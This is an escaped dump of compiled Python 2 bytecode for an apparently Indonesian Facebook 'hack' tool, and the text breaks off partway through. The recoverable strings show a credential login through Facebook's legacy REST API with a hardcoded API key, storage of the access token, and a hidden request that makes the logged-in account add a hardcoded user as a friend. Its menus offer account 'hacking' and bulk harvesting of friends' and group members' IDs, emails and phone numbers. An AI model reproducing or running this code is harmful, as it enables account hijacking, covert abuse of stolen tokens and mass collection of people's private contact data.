x00d\x07\x00k\x02\x00rM\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00rc\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00ry\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\x8f\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Logins7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Login using tokens*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Exits\n\x00\x00\x00\x1b[1;97m\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputt\x01\x00\x00\x001t\x01\x00\x00\x002t\x01\x00\x00\x000(\x07\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00t\x06\x00\x00\x00tokenz(\x01\x00\x00\x00t\x04\x00\x00\x00msuk(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00masuk\x8c\x00\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb7\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\x89\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xb2\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x04\x00\x83\x01\x00}\x01\x00t\x08\x00j\x08\x00d\x05\x00\x83\x01\x00}\x02\x00t\t\x00\x83\x00\x00\x01y\x11\x00t\n\x00j\x02\x00d\x06\x00\x83\x01\x00\x01Wn \x00\x04t\x0b\x00j\x0c\x00k\n\x00r\xa4\x00\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01n\x01\x00Xt\x0e\x00t\n\x00j\x0f\x00_\x10\x00t\n\x00j\x11\x00d\x08\x00d\t\x00\x83\x00\x01\x01|\x01\x00t\n\x00j\x12\x00d\n\x00<|\x02\x00t\n\x00j\x12\x00d\x0b\x00<t\n\x00j\x13\x00\x83\x00\x00\x01t\n\x00j\x14\x00\x83\x00\x00}\x03\x00d\x0c\x00|\x03\x00k\x06\x00rT\x02y.\x01d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x02\x00\x17d\x0f\x00\x17}\x04\x00i\x0b\x00d\x10\x00d\x11\x006d\x12\x00d\x13\x006|\x01\x00d\n\x006d\x14\x00d\x15\x006d\x16\x00d\x17\x006d\x16\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006|\x02\x00d\x12\x006d\x1d\x00d\x1e\x006d\x1f\x00d \x006}\x05\x00t\x15\x00j\x16\x00d!\x00\x83\x01\x00}\x06\x00|\x06\x00j\x17\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x18\x00\x83\x00\x00}\x07\x00|\x05\x00j\x17\x00i\x01\x00|\x07\x00d"\x006\x83\x01\x00\x01d#\x00}\x03\x00t\x19\x00j\x1a\x00|\x03\x00d$\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1b\x00j\x1c\x00|\x08\x00j\x1d\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d%\x00\x83\x02\x00}\n\x00|\n\x00j\x1e\x00|\t\x00d&\x00\x19\x83\x01\x00\x01|\n\x00j\x1f\x00\x83\x00\x00\x01d\'\x00GHt\x19\x00j \x00d(\x00|\t\x00d&\x00\x19\x17\x83\x01\x00\x01t\x00\x00j\x01\x00d)\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01WqT\x02\x04t\x19\x00j!\x00j"\x00k\n\x00rP\x02\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01qT\x02Xn\x00\x00d*\x00|\x03\x00k\x06\x00r\x89\x02d+\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01q\xb3\x02d.\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t%\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(/\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mID\x1b[1;97m|\x1b[1;96mEmail\x1b[1;97m \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s\x16\x00\x00\x00https://m.facebook.coms\x19\x00\x00\x00\n\x1b[1;91m[!] No connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatR8\x00\x00\x00t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodR:\x00\x00\x00t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x11\x00\x00\x00t\x0c\x00\x00\x00access_tokens5\x00\x00\x00\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin successfullysM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=R\n\x00\x00\x00t\n\x00\x00\x00checkpoints%\x00\x00\x00\n\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x18\x00\x00\x00\n\x1b[1;91m[!] Login Failed(&\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x07\x00\x00\x00getpassR#\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x19\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00idR6\x00\x00\x00t\x03\x00\x00\x00urlRO\x00\x00\x00t\x04\x00\x00\x00dataR\x10\x00\x00\x00t\x01\x00\x00\x00aR\'\x00\x00\x00R\x1e\x00\x00\x00t\x04\x00\x00\x00zedd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R2\x00\x00\x00\xa3\x00\x00\x00sf\x00\x00\x00\x00\x01\r\x01\x03\x01\x0f\x01\x0b\x01\x13\x01\r\x01\x05\x01\x0c\x01\x0f\x01\x07\x01\x03\x01\x11\x01\x10\x01\x05\x01\x0b\x01\x0c\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x0c\x01\x03\x01\x16\x01S\x01\x0f\x01\r\x01\x0c\x01\x14\x01\x06\x01\x15\x01\x12\x01\x0f\x01\x11\x01\n\x01\x05\x01\x15\x01\r\x01\x0b\x01\x13\x01\x05\x01\x0e\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x02\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xda\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00}\x00\x00y`\x00t\x04\x00j\x05\x00d\x03\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x04\x00\x19}\x03\x00t\t\x00d\x05\x00d\x06\x00\x83\x02\x00}\x04\x00|\x04\x00j\n\x00|\x00\x00\x83\x01\x00\x01|\x04\x00j\x0b\x00\x83\x00\x00\x01t\x0c\x00\x83\x00\x00\x01WnU\x00\x04t\r\x00k\n\x00r\xd5\x00\x01\x01\x01d\x07\x00GHt\x03\x00d\x08\x00\x83\x01\x00}\x05\x00|\x05\x00d\t\x00k\x02\x00r\xb5\x00t\x0e\x00\x83\x00\x00\x01q\xd6\x00|\x05\x00d\n\x00k\x02\x00r\xcb\x00t\x0f\x00\x83\x00\x00\x01q\xd6\x00t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x0b\x00\x00\x00NR&\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mToken\x1b[1;91m : \x1b[1;97ms+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\t\x00\x00\x00login.txtR\x11\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] Wrongs6\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mWant to pick up token?\x1b[1;97m[y/n]: R\n\x00\x00\x00t\x01\x00\x00\x00y(\x10\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00otwRm\x00\x00\x00t\x04\x00\x00\x00namaRn\x00\x00\x00R\x1f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R;\x00\x00\x00\xda\x00\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x05\x01\x0c\x01\x03\x01\x13\x01\x12\x01\n\x01\x0f\x01\r\x01\n\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sc\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00WnD\x00\x04t\x04\x00k\n\x00rl\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy=\x00t\x08\x00j\t\x00d\x07\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00|\x01\x00j\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00d\x08\x00\x19}\x03\x00|\x02\x00d\t\x00\x19}\x04\x00Wnf\x00\x04t\r\x00k\n\x00r\xf0\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\n\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n#\x00\x04t\x08\x00j\x0e\x00j\x0f\x00k\n\x00r\x12\x01\x01\x01\x01d\x0b\x00GHt\x10\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x11\x00GHd\x0c\x00|\x03\x00\x17d\r\x00\x17GHd\x0e\x00d\x0f\x00d\x10\x00\x14\x17GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHt\x12\x00\x83\x00\x00\x01d\x00\x00S(\x16\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00Rj\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x18\x00\x00\x00\x1b[1;91m[!] No connections:\x00\x00\x00\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92ms\x07\x00\x00\x00\x1b[1;97ms\n\x00\x00\x00\x1b[1;97m\xe2\x95\x9ai(\x00\x00\x00s\x03\x00\x00\x00\xe2\x95\x90s\x14\x00\x00\x001]. User informations(\x00\x00\x002]. Hack facebook account s\x19\x00\x00\x003]. Show token s\x16\x00\x00\x004]. LogOut s\x1f\x00\x00\x005]. Exit the programs (\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00R.\x00\x00\x00t\x05\x00\x00\x00pilih(\x05\x00\x00\x00R4\x00\x00\x00Rp\x00\x00\x00Rm\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x00\x00\x00\xf1\x00\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x0e\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x05\x01\x0b\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf9\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xce\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xb8\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xa2\x00|\x00\x00d\x06\x00k\x02\x00r\xa3\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x08\x00d\t\x00\x83\x02\x00j\x08\x00\x83\x00\x00}\x01\x00d\n\x00|\x01\x00\x17GHt\x00\x00d\x0b\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nR\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t\x04\x00j\x05\x00d\r\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x0e\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0f\x00k\x02\x00r\xe9\x00t\n\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00t\x01\x00\x00\x003R&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s-\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mYour token\x1b[1;91m :\x1b[1;97m s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]t\x01\x00\x00\x004s\x10\x00\x00\x00rm -rf login.txtsA\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlAR:\x00\x00\x00(\x0b\x00\x00\x00R/\x00\x00\x00Rr\x00\x00\x00t\t\x00\x00\x00informasit\t\x00\x00\x00menu_hackR\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00Rn\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rr\x00\x00\x00\x14\x01\x00\x00s.\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\x15\x01\t\x01\n\x01\n\x01\x0c\x01\r\x01\r\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xaa\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00d\x08\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\t\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00x\xf6\x01|\x03\x00d\n\x00\x19D]\xd4\x01}\x04\x00|\x01\x00|\x04\x00d\x0b\x00\x19k\x06\x00s\xde\x00|\x01\x00|\x04\x00d\x0c\x00\x19k\x06\x00r\xb8\x00t\x0b\x00j\x0c\x00d\r\x00|\x04\x00d\x0c\x00\x19\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x00\x83\x01\x00}\x06\x00d\x0f\x00d\x10\x00\x14GHy\x11\x00d\x11\x00|\x06\x00d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00rA\x01\x01\x01\x01d\x12\x00GHn\x01\x00Xy\x11\x00d\x13\x00|\x06\x00d\x0c\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00rk\x01\x01\x01\x01d\x14\x00GHn\x01\x00Xy\x11\x00d\x15\x00|\x06\x00d\x16\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x95\x01\x01\x01\x01d\x17\x00GHn\x01\x00Xy\x11\x00d\x18\x00|\x06\x00d\x19\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1a\x00GHn\x01\x00Xy\x15\x00d\x1b\x00|\x06\x00d\x1c\x00\x19d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xed\x01\x01\x01\x01d\x1d\x00GHn\x01\x00Xy\x11\x00d\x1e\x00|\x06\x00d\x1f\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x17\x02\x01\x01\x01d \x00GHn\x01\x00XyL\x00d!\x00GHx@\x00|\x06\x00d"\x00\x19D]4\x00}\x07\x00y\x15\x00d#\x00|\x07\x00d$\x00\x19d\x0b\x00\x19\x17GHWq+\x02\x04t\x10\x00k\n\x00r^\x02\x01\x01\x01d%\x00GHq+\x02Xq+\x02WWn\x11\x00\x04t\x10\x00k\n\x00rw\x02\x01\x01\x01n\x01\x00Xt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01q\xb8\x00q\xb8\x00Wd\'\x00GHt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01d\x00\x00S((\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97ms,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : R?\x00\x00\x00s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTelephone\x1b[1;97m : t\x0c\x00\x00\x00mobile_phones9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mTelephone\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : t\x08\x00\x00\x00locations9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mDate of birth\x1b[1;97m : t\x08\x00\x00\x00birthdays9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mDate of birth\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : t\t\x00\x00\x00educations#\x00\x00\x00\x1b[1;91m ~ \x1b[1;97mt\x06\x00\x00\x00schools,\x00\x00\x00\x1b[1;91m ~ \x1b[1;91mNot founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1b\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] User not found(\x12\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R+\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00aidR\'\x00\x00\x00t\x03\x00\x00\x00cokR\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00t\x01\x00\x00\x00q(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Ru\x00\x00\x00/\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\n\x01\x13\x01\x12\x01\x11\x01 \x01\x1f\x01\x12\x01\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x15\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x05\x01\x11\x01\x03\x01\x15\x01\r\x00\x11\x01\r\x00\x04\x01\n\x01\n\x02\x04\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xb9\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x13\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Get ID friends?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Get ID friend from friends3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Get ID Searchs9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Get group member IDs<\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Get group member emailsC\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Get group member phone numbers6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Get email friendsB\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m8.\x1b[1;97m Get email friend from friendsA\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m9.\x1b[1;97m Get a friend\'s phone numbersN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m10.\x1b[1;97m Get a friend\'s phone number from friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m 